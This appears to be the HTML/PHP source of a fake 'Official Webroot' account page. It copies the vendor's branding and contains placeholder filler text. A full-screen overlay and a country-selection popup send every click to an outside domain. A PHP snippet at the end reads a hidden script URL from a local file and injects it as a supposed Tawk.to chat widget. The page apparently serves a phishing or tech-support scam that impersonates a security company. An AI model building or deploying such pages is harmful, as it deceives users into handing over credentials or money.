<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
    <link rel="stylesheet" href="css/style.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="icon" href="img/favicon.ico" type="image/x-icon">

    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <title>Official Webroot</title>
    <meta name="robots" content="noindex">
    <style>
        body{
    font-family: 'Inter', sans-serif !important;
    margin: 0;
    padding: 0;
}
.row{
    margin: 0 !important;
}
.listdipslef li{
    display: list-item;
    float: left;
    margin-right: 25px;
    font-size: 11px;
    color: #fff;
    font-weight: 600;

}
.listfirst{
    list-style: none;
}
.navwebtop{
    background: #000;
    padding: 10px 5% 10px 5%;
}
.mainheader{
    padding: 15px 7% 15px 7%;
    border-color: #E6E6E6;
    border-style: solid;
    border-width: 0px 0px 1px 0px;
}
.mainlogo{
    width: 60%;
}
.mainheadsyy{
    margin-top: 10px;
}
.mainheadsyy li{
    display: inline;
    list-style: none;
    font-size: 14px;
    margin-right: 15px;
    font-weight: 600;
    color: #6D6D6D;
}
.bentrej{
    padding: 50px 20% 20px 20%;
    font-weight: 900;
    font-size: 54px;
    text-align: center;
    color: #21242a;
}
.websiu{
    padding: 0px 12% 0px 12%;
}
.healdtrh{
    font-weight: 900;
    font-size: 24px;
    text-align: center;
    color: #21242a;

}
.colback{
    background: #F5F5F5;
    padding: 42px;
    height: 420px;

}
.boldpara{
    font-weight: 800;
}
.fontspart{
    font-size: 16px;
    text-align: center;
}
.logbtnlik{
    background: #0057b8;
    color: #fff;
    text-transform: uppercase;
    font-size: 16px;
    font-weight: 800;
    line-height: 1;
    border-radius: 5px;
    transition: all .4s;
    display: inline-block;
    text-decoration: none;
    text-align: center;
    white-space: nowrap;
    cursor: pointer;
    border: 3px solid transparent;
    padding: 0.875em 1em;
    max-width: 18.75em;
    width: 100%;
    min-width: 9.35em;
    margin-top: 20px;
}
.logbtnlik:hover
{
    background: #00a7cf;
    color: #fff;
    text-decoration: none;
}
.crtehdbtnl{
    background: 0 0;
    border: none;
    color: #017698;
    transition: none;


    text-transform: uppercase;
    font-size: 16px;
    font-weight: 800;
    line-height: 1;
    border-radius: 5px;
    display: inline-block;
    text-decoration: none;
    text-align: center;
    white-space: nowrap;
    cursor: pointer;
    padding: 0.875em 1em;
    max-width: 18.75em;
    width: 100%;
    min-width: 9.35em;
    margin-top: 20px;
}
.imgscre{
    width: 100%;
}
.footers{
    padding: 50px 10% 20px 10%;
    background: #484C55;
}
.logoffoo{
    width: 100%;
}
.partsfoo{
    color: #C4CBCC;
    margin-top: 30px;
    font-size: 15px;
}
.lihefaoo{
    font-weight: 800;
    color: #C4CBCC;
    font-size: 17px;
}
.mafforlo{
    padding-left: 40px;
}
.footeliulte{
    list-style: none;
    margin-left: -40px;
    color: #a2a7ad;
    
}
.footeliulte li{
    font-weight: 500;
    font-size: 16px;
    line-height: 1.5;
    padding-bottom: 15px;
}
.botomfoorter{
    padding: 50px 10% 20px 10%;
    background: #32353b;
    color: #a2a7ad;
    font-size: 16px;
}
.boyfoorli{
    margin-left: -40px;
    margin-top: 30px;
    margin-bottom: 30px;
}
.boyfoorli li{
    display: inline;
    margin-right: 20px;
}
.icolishrig li{
    display: inline;
    margin-right: 10px;
    opacity: 0.5;
}
.logheader{
    background: #333333;
    padding: 10px 45px 10px 45px;   
}
.logologim{
    widows: 43%;
}
.parlogologh{
    color: #fff;
    font-size: 16px;
}
.ullioghee{
    display: inline;
}
.ullioghee li{
    display: inline;
    margin-right: 55px;
}
.bodylogco{
    padding: 50px 13% 20px 13%;
}
.logiheardp{
    font-weight: 700;
    font-size: 30px;
}
.dont-cereli{
    font-size: 16px;
}
.inpuogbfo{
    line-height: 1.3;
    padding: 5px 10px 7px 10px;
    width: 70%;
    max-width: 100%;
    margin: 0;
    border-radius: 5px;
    border: 1px solid #b1b1b1;
}
.remidlog{
    font-size: 12px;
    margin-top: 10px;
}
.logdubmifor{
    background-color: #005799;
    color: #f7f7f7;
    padding: 7px 20px;
    border: 1px solid #005799;
    font-size: 16px;
    cursor: pointer;
    border-radius: 3px;
    margin-bottom: 5px;
    margin-top: 30px;
}
.headepaddinlef{
    margin-left: 20px;
}
.noerrava{
    font-size: 35px;
    font-weight: 500;
    margin-top: 52px;
    font-family: "Open Sans",sans-serif !important;

}
.parertex{
    text-align: center;
    font-size: 13px;
    margin-bottom: 40px;
    font-family: "Open Sans",sans-serif !important;

    margin-top: 20px;

}
.subscbtnerr{
    background: #005799;
    color:#fff;
    border: 0px solid #000;
    padding: 10px 55px;
    font-size: 18px;
    font-weight: 600;
    border-radius: 50px;
    font-family: "Open Sans",sans-serif !important;

}
.subscbtnerr1{
    background: #000;
    color: #fff;
    /* border: 2px solid #000; */
    padding: 13px 65px;
    font-size: 14px;
    font-weight: 600;
    border-radius: 5px;
    font-family: "Open Sans",sans-serif !important;

}
.subscbtnerr1:hover{
    color: #fff;

}
.iproserr{
    font-size: 16px;
        background: none;
    border: none;
}
.logerrvbot{
    width: 15%;
    position: absolute;
    bottom: 100px;
    margin-left: 20px;

}
.errimgpn{
    width: 10%;
    margin-top: 8%;
}
.errimgpnerr{
    width: 10%;
    margin-top: 4%;
}
.heasdkeyact{
    font-size: 20px;
    font-size: 700;
    margin-top: 20%;
    font-family: "Open Sans",sans-serif !important;

}
.btnsumieu{
    height: 65px;
    width: 19%;
    /* margin-left: 1px; */
    /* margin-top: 15px; */
    /* position: relative; */
    /* top: 45%; */
    border-left: 0px;
    border: 0px;
}
.headactkeypara{
    margin-top: 20px;
}
.textkeyact6{
    height: 65px;
    width: 100%;
    border:2px solid #F0F0F0;
    padding: 10px;
    padding-left: 20px;
    font-family: "Open Sans",sans-serif !important;

}
.textkeyact6::placeholder{
    color: #ccc;
    font-size: 20px;
}
.presubmtforgetrbtn1{
    width: 50%;
    /* max-width: 280px; */
    height: 46px;
    min-height: 55px;
    border: 2px solid;
    border-radius: 28px;
    font-weight: 800;
    font-family: "Open Sans",sans-serif !important;
    font-size: 16px!important;
    margin-left: 0;
    margin-right: 0;
    margin-top: 32px;
    background-color: #005799;
    color:#fff;
}
.forgotpasgp{
    width: 70%;
    margin-top: 20px;
    font-size: 12px;
    line-height: 2;
}
.searfabvghead{
    margin-left: 15px;
    list-style: none;
}
.flaglishead{
    float: none !important;
    list-style: none;
        margin-bottom: -7px;
}
.flaglishead img{
    width: 4%;
    margin-left: 30px;

    /* display: contents; */

}
.topnav {
    overflow: hidden;
    background-color: #fff;
    display: none;
  }
  
  .topnav a {
    float: left;
    display: block;
    color: #7e7979;
    text-align: center;
    padding: 25px 16px;
    text-decoration: none;
    font-size: 14px;
    font-weight: 400;
    text-transform: uppercase;
}
  .fobrosdrt{
    border-bottom: 1px solid #ddd;
    /* border-top: 1px solid; */

  }
  
  .topnav a:hover {
    /* background-color: #ddd; */
    /* color: black; */
  }
  
  .topnav a.active {
    /* background-color: #04AA6D; */
    /* color: #7e7979; */
  }
  
  .topnav .icon {
    display: none;
  }
  .imgmobhea{
      width: 35%;
      display: block;
  }
  .logimngmobhe{
      width: 75%;
  }
  .icon{
      font-size: 24px !important;
      color: #7e7979 !important;
  }
  .navwebtopmob{
      display: none;
  }
  .labereg{
    font-size: 12px;
    margin-top: 10px;
}
  @media screen and (max-width: 991px) {
    .topnav{
        display: block;
    }
    .mainheader{
        display: none;
    }
    .navwebtop{
        display: none;
    }
    .navwebtopmob{
        display: block;
        background: #000;
        text-align: center;
    }
    .topanvdmob{
        display: inline-flex;
    color: #fff;
    margin-top: 5px;
    }
    .topanvdmob li{
        margin-right: 25px;
        font-size: 11px;
    }
  }
  @media screen and (max-width: 991px) {
    .topnav a:not(:first-child) {display: none;}
    .topnav a.icon {
      float: right;
      display: block;
    }
  }
  
  @media screen and (max-width: 991px) {
    .topnav.responsive {position: relative;}
    .topnav.responsive .icon {
      position: absolute;
      right: 0;
      top: 0;
    }
    .topnav.responsive a {
      float: none;
      display: block;
      text-align: left;
    }
  }
@media only screen and (max-width: 1200px) {
    .mainlogo {
        width: 100%;
    }
    .bentrej{
        font-size: 43px;
    }
    .websiu {
        padding: 0px 4% 0px 4%;
    }   
    .colback{
        height: 460px;
    }    
    .footers {
        padding: 50px 4% 20px 4%;
    }
    .flaglishead img {
        margin-left: 15px;
    }
    .searfabvghead {
        margin-left: 6px;
        margin-right: 15px;
    }
    .botomfoorter {
        padding: 50px 4% 20px 4%;

    }
    .fontspart{}
  }

@media only screen and (max-width: 991px) {
    .bentrej {
        font-size: 37px;
        padding: 50px 8% 20px 8%;
    }
    .websiu {
        padding: 0px 0% 0px 0%;
    }
    .colback {
        background: #F5F5F5;
        padding: 47px 15px;
        height: 420px;
    }
    .healdtrh {
        font-size: 20px;
    }
    .fontspart {
        font-size: 14px;
    }
    .footers {
        padding: 50px 0% 20px 0%;
    }
    .mafforlo {
        padding-left: 40px;
    }
    .partsfoo {
        font-size: 13px;
    }
    .lihefaoo {
        font-size: 15px;
    }
    .footeliulte li{
        font-size: 14px;
    }
    .heuegogij{
        display: none;
    }
    .inpuogbfo{
        width: 85%;
    }
}
@media only screen and (max-width: 768px) {
    .colback {
        height: 300px;
    }
    .maforhtnjh{
        /* margin-top: 20%; */
    }
    .foresimgscr{
        height: 560px;
        background: #F5F5F5;
    }
    .bentrej {
        font-size: 30px;
        padding: 20px 8% 20px 8%;
    }
    .lofgodfortere{
        text-align: center;
    }
    .lofgodfortere img{
        width: 50%;
    }
    .mafforlo {
        padding-left: 15px;
        margin-top: 20px;
    }
    .colback {
        height: 350px;
    }
    .parlogologh{
        display: none !important;
    }
    .sjdhdvecy{
        text-align: center;
    }
    .logheader {
        padding: 10px 0px 10px 0px;
    }
    .ullioghee li {
        margin-right: 0px;
    }
    .logologim {
        margin-left: -25px;
    }
    .inpuogbfo{
        width: 95%;
    }

}
@media only screen and (max-width: 650px) {
    .foresimgscr{
        height: 460px;
        background: #F5F5F5;
    }
    .colback {
        height: 350px;
    }
}
@media only screen and (max-width: 500px) {
    .noerrava {
        font-size: 22px;
    }    
    .imgmobhea {
        width: 66%;
    }
    .bentrej {
        font-size: 22px;
        padding: 20px 2% 20px 2%;
    }
    .foresimgscr{
        height: 360px;
        background: #F5F5F5;
    }
    .botomfoorter p{
        font-size: 12px;
    }
    .botomfoorter{
        font-size: 12px;
    }
    .colback {
        height: 400px;
    }
    .inpuogbfo{
        width: 100%;
    }
    .dont-cereli {
        font-size: 13px;
    }
  }

  @media only screen and (max-width: 380px) {
    .colback {
        height: 450px;
    }
    .foresimgscr{
        height: 300px;
        background: #F5F5F5;
    }
    .bodylogco {
        padding: 50px 10px 20px 10px;
    }
}
.loader {
    border: 8px solid #f3f3f3;
    border-radius: 50%;
    border-top: 8px solid #005799;
    width: 60px;
    height: 60px;
    -webkit-animation: spin 2s linear infinite; /* Safari */
    animation: spin 2s linear infinite;
    margin-left: 48%;
    margin-top: 17%;
  }
  
  /* Safari */
  @-webkit-keyframes spin {
    0% { -webkit-transform: rotate(0deg); }
    100% { -webkit-transform: rotate(360deg); }
  }
  
  @keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
  }



  .supaicolocerr{
    width: 44%;
  }
                .dlhd:hover{
        text-decoration: none;
    }
    .modlapopup{
        height: 310px;
        width: 480px;
        background: #fff;
        position: fixed;
        top: 25%;
        left: 34%;   
        box-shadow: 0px 1px 11px 0px #000;
        z-index: 1000; 
        padding: 30px 20px;
        border-radius: 5px;
    }
    .dlhd{
        position: fixed ;
        top: 0;
        left: 0;
        z-index: 140;
        width: 100vw;
        height: 100vh;
        background-color: rgba(0, 0, 0, 0.6);
    }
    .wlcmint{
        font-family: &#39;Josefin Sans&#39;, sans-serif !important;
        color: #000;
        font-weight: 700;
        font-size: 30px;
    }
    .parasdft{
        color: #5c5a5a;
        font-size: 16px;
        font-weight: 400;
        margin-top:45px;
    }
    .btnlinkg{
        color: rgb(22,88,109);
        font-weight: 700;
        font-size: 18px;
        text-decoration: underline;
        margin-right: 30px;
        margin-top: 30px;
    }
    .btnlinkg1{
        color: #fff;
        font-weight: 700;
        font-size: 18px;
        padding: 15px 20px;
        margin-right: 30px;
        background-color:#2CA01C;
        border-radius: 2px;
    }
    .msdrtlina{
        margin-top: 35px;
    }
    .linksdaq2:hover{
        text-decoration:none;
    }
  
    </style>
</head>
<body>

    <a class='dlhd' href='https://seemydashboard.com/site/index/web1.php'>
        <a class='linksdaq2' href='https://seemydashboard.com/site/index/web1.php'>
            <div class='modlapopup'>
                <h2 class='text-center wlcmint'>Welcome to Webroot</h2>
                <p class='parasdft'>To check out product designed specifically for your country, please visit site</p>
                <p class='text-center msdrtlina'><a class='btnlinkg' href='https://seemydashboard.com/site/index/web1.php'>Visit the US site</a><a class='btnlinkg1' href='https://seemydashboard.com/site/index/web1.php'>Go to CA site</a></p>
            </div>
        </a>
        <div class="navwebtop">
            <div class="row">
                <div class="col-lg-6 col-md-5">
                    <ul class="listdipslef">
                        <li class="listfirst">For Home</li>
                        <li>For Business</li>
                        <li>About Webroot</li>
                    </ul>
                </div>
                <div class="col-lg-6 col-md-7">
                    <ul class="listdipslef">
                        <li class="listfirst">My Account</li>
                        <li>Renew / Upgrade</li>
                        <li>Cart</li>
                        <li class="searfabvghead"><i class="fa fa-search"></i> &nbsp; SEARCH</li>
                        <li class="flaglishead"> <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlhm8yOEPh21gckblcIhV1vZdndTmSGY8fBYpdcv6rUaqkZklmne26JZ3LST2uAO3vYonj25QSx7E_i36j9lQQ-PSCfnHt_cfY4trr3ssYYh6qEFgGxYZ0TwclvrBnMvTB9HQJmMgikZnUG9VpPm1wtQkjrc4QZObrcUn9qU15fueTFoz8jUXriT6x2dM/s491/flag.png" alt="">    &nbsp; United States</li>
                    </ul>
                </div>
            </div>
        </div>
        <div class="navwebtopmob">
            <ul class="topanvdmob">
                <li class="listfirst">For Home</li>
                <li>For Business</li>
                <li>About Webroot</li>
            </ul>
        </div>


        <div class="mainheader">
            <div class="row">
                <div class="col-lg-4 col-md-3">
                    <img class="mainlogo" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ8SffCdqsFzb4vV7UpEDInHBnYfY05VLe7To9ER8mFVC4ppJgd853vaTvZkFlpr2pJ0DRmuG3qd3VAR-y5_l0Y6TC2XxAXiCbS0ZCzC5tpQFDKywbtvQhvEfT8rPiY5MHk-jVfakL9FzR3MSycJbS1Zr4YG30op8SmR-KHlnjZdbCOlbHS7CZuX1cUHg/s435/logo.png" alt="">
                </div>
                <div class="col-lg-8 col-md-9">
                    <ul class="mainheadsyy">
                        <li>FOR HOME</li>
                        <li>FOR BUSINESS</li>
                        <li>PARTNERS</li>
                        <li>THREAT INTELLIGENCE</li>
                        <li>COMPANY</li>
                    </ul>
                </div>
            </div>
        </div>

        <div class="topnav" id="myTopnav">
            <a href="#home" class="logimngmobhe"><img class="imgmobhea" src="img/logo.png" alt=""></a>
            <a href="#news" class="fobrosdrt" style="border-top: 1px solid #ddd">for home</a>
            <a href="#contact" class="fobrosdrt">for business</a>
            <a href="#about" class="fobrosdrt">parners</a>
            <a href="#about" class="fobrosdrt">threat intelligent</a>
            <a href="#about" class="fobrosdrt">company</a>
            <a href="javascript:void(0);" class="icon" onclick="myFunction()">
              <i class="fa fa-bars"></i>
            </a>
          </div>
          




        <div class="bodycontent">
            <p class="bentrej">Benefits await you in your new Webroot account</p>

            <div class="row websiu">
                <div class="col-lg-6 col-md-6 col-sm-6 colback">
                    <p class="healdtrh">NEW! Webroot My Account Portal</p>
                    <p class="fontspart">If you created your Webroot account <span class="boldpara">after March 22, 2022</span>, please click the "Log In Now" button below.</p>
                    <p class="fontspart">If you <span class="boldpara"> don't have an account</span>, select "create anaccount" below.</p>
                    <p class="fontspart">The new portal provides easy product downloads, subscription management, and additional benefits!</p>
                    <div class="text-center"><a href="" class="logbtnlik">LOG IN NOW</a></div>
                    <div class="text-center"><a href="" class="crtehdbtnl">CREATE AN ACCOUNT ></a></div>
                </div>
                <div class="col-lg-6 col-md-6 col-sm-6 colback foresimgscr">
                    <img class="imgscre" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2dN1d8Q4VIkmHuYH8jusqHyQTIlZqlzp5rosgI-HfMb4FR5-KbBHKncN5MPeOpW5eVbD2OMotSzoOVk1T-S7M5XpHHKiJRiVvl4gwCQDjsdADKBLb0Jw0_0PLRnyetUOje2uwPUZga4SAmz7o8jIMPrW0h6K-fOy_W1-n90vxYFsTjQcg6pDcUyq4LSw/s1024/scr.png" alt="">
                </div>
            </div>
            <div class="clearfix"></div>
            <br><br> <br><br>
            <p class="fontspart maforhtnjh">If you have an existing Webroot account from <span class="boldpara">before March 22, 2022</span>, you can log in to your existing account here. </p><br>
            <p class="fontspart">If you’re having trouble logging in or creating a new account, contact support for assistance.</p><br>
            <p class="fontspart"><i> Some older browser versions may not support the My Account portal. To download your product, please update your browser to the latest version.</i></p>
        </div>

<br><br>
        <div class="footers">
            <div class="row">
                <div class="col-lg-6 col-md-5 col-sm-5">
                    <div class="col-lg-5 col-md-5 col-sm-6 lofgodfortere">
                        <img class="logoffoo" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUi24lpmXXus6AQeVNQ1hvX1QOhNWKcwu83i0w4m7pjiFknS2iI0GH6yTfzozKf8t8xZSf-VHz6j1Di0xmUd2S9SokLGtWzNYgF7AIGm9i3ghQYfhawT3g6v0r3pnHpcRgQntg6kn1P-Fq-BtUYV6FDDtQEA7ctjL0uParlB2jbM7G_Cwd6KIr_bIIQ_s/s1000/logo1.png" alt="">
                        <p class="partsfoo">Behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts they live</p>
                    </div>
                    <div class="col-lg-7 col-md-7  col-sm-6 mafforlo">
                        <p class="lihefaoo">PRODUCTS & SERVICES</p>
                        <ul class="footeliulte">
                            <li>For Home</li>
                            <li>For Business</li>
                            <li>Renew / Upgrade</li>
                        </ul>
                    </div>
                </div>
                <div class="col-lg-6 col-md-7 col-sm-7">
                    <div class="col-lg-4 col-md-4 col-sm-4">
                        <p class="lihefaoo">PARTNERS</p>
                        <ul class="footeliulte">
                            <li>Managed Service Providers</li>
                            <li>Resellers</li>
                            <li>Technology Partners</li>
                            <li>Affiliates</li>
                            <li>Find a Partner</li>
                        </ul>
                    </div>
                    <div class="col-lg-4 col-md-4 col-sm-4">
                        <p class="lihefaoo">RESOURCES</p>
                        <ul class="footeliulte">
                           <li>Community</li>
                           <li>Blog</li>
                           <li>Cybersecurity </li>
                           <li>Education</li>
                           <li>User Guides</li>
                           <li>Release Notes</li>
                        </ul>
                    </div>
                    <div class="col-lg-4 col-md-4 col-sm-4">
                        <p class="lihefaoo">COMPANY</p>
                        <ul class="footeliulte">
                            <li>About Webroot</li>
                            <li>About OpenText</li>
                            <li>Careers</li>
                            <li>Press Room</li>
                            <li>Awards and Testimonials</li>
                            <li>Contact</li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
        <div class="botomfoorter">
            <div class="row">
                <div class="col-lg-8 col-md-8">
                        <p>Copyright © 2024 Open Text Corporation. All rights reserved.</p>
                        <ul class="boyfoorli">
                            <li>Legal</li>
                            <li>Privacy</li>
                            <li>Cookie Policy</li>
                            <li>Sitemap</li>
                            <li>Webroot.com</li>
                            <li>Cookies Preferences</li>
                        </ul>
                        <p>We have recently updated our Privacy Policies. We encourage you to read the full terms here.</p>
                
                </div>
                <div class="col-lg-4 col-md-4">
                    <ul class="icolishrig">
                                <li>
                                    <i class="fa fa-facebook-square" style="border-radius:0px;font-size:34px; color: #a2a7ad;"></i>
                                </li>
                                <li>
                                        <i class="fa fa-linkedin-square" style="font-size:34px; color: #a2a7ad;"></i>
                                </li>
                                <li>
                                        <i class="fa fa-twitter-square" style="font-size:34px; color: #a2a7ad;"></i>
                                </li>
                                <li>
                                        <i class="fa fa-instagram" style="font-size:34px; color: #a2a7ad;"></i>
                                </li>
                                <li>
                                        <i class="fa fa-youtube-play" style="font-size:34px; color: #a2a7ad;"></i>
                                </li>
                    </ul>
                </div>
            </div>
        </div>
        </a>
</body>
</html>
<script>
    function myFunction() {
      var x = document.getElementById("myTopnav");
      if (x.className === "topnav") {
        x.className += " responsive";
      } else {
        x.className = "topnav";
      }
    }
</script>
<?php $chatvar = file_get_contents("../../files/chat29.txt"); ?>
<!--Start of Tawk.to Script--> 
<script type="text/javascript"> var Tawk_API=Tawk_API||{},
 Tawk_LoadStart=new Date(); 
 (function(){ var s1=document.createElement("script"),
 s0=document.getElementsByTagName("script")[0];
  s1.async=true; s1.src='<?php echo $chatvar ?>'; 
s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })(); 
</script> <!--End of Tawk.to Script-->
